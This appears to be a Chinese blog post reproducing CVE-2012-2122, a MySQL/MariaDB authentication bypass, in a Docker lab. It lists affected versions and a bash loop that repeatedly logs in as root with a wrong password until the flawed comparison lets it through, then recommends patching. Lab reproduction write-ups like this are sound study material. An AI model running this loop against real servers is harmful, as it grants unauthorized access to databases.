热门标签
热门文章
- 1AI PNG Enlarger (AI图片放大工具) - 用深度学习AI算法放大图片,不模糊并保持透明度
- 2金三银四,自动化测试高频面试题【饿了么二面】_饿了么测试开发面试题
- 3使用Windbg分析C++虚函数表原理_c++windbg
- 4使用 scikit-image 进行图像处理
- 5Centos7下使用YUM安装mysql8_centos7 yum安装mysql8
- 6AI扩图网站哪个好用?这4款扩图值得推荐
- 7MySQL二进制日志(binlog)解析工具
- 8Linux 下 make 命令 及 make 笔记
- 9Git完整基础教程、浅显易懂(附全部命令执行方法)_git入门教程 简单易懂
- 10多屏幕时将Dock菜单栏固定在Mac Book Pro 主屏幕_mac分屏怎么让dock保持在主屏上
当前位置: article > 正文
【Mysql身份认证漏洞复现(CVE-2012-2122)】_mysql输入验证错误漏洞
作者:木道寻08 | 2024-08-16 08:04:38
赞
踩
mysql输入验证错误漏洞
一、漏洞简介
当连接 MariaDB/MySQL 时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是 memcmp() 返回一个非零值,也会使 MySQL 认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入 SQL 数据库。
二、受版本影响
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
三、主机准备
docker 靶机:192.168.47.144
四、漏洞复现
docker搭建靶场环境
查看镜像是否启动成功
访问3306端口查看,如图环境搭建成功
在不知道我们环境正确密码的情况下,在bash下运行如下命令,在一定数量尝试后便可成功登录:
for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.47.144 -P3306 ; done
显示数据库
复现完成
五、修复建议
升级官方补丁
更新mysql版本
声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
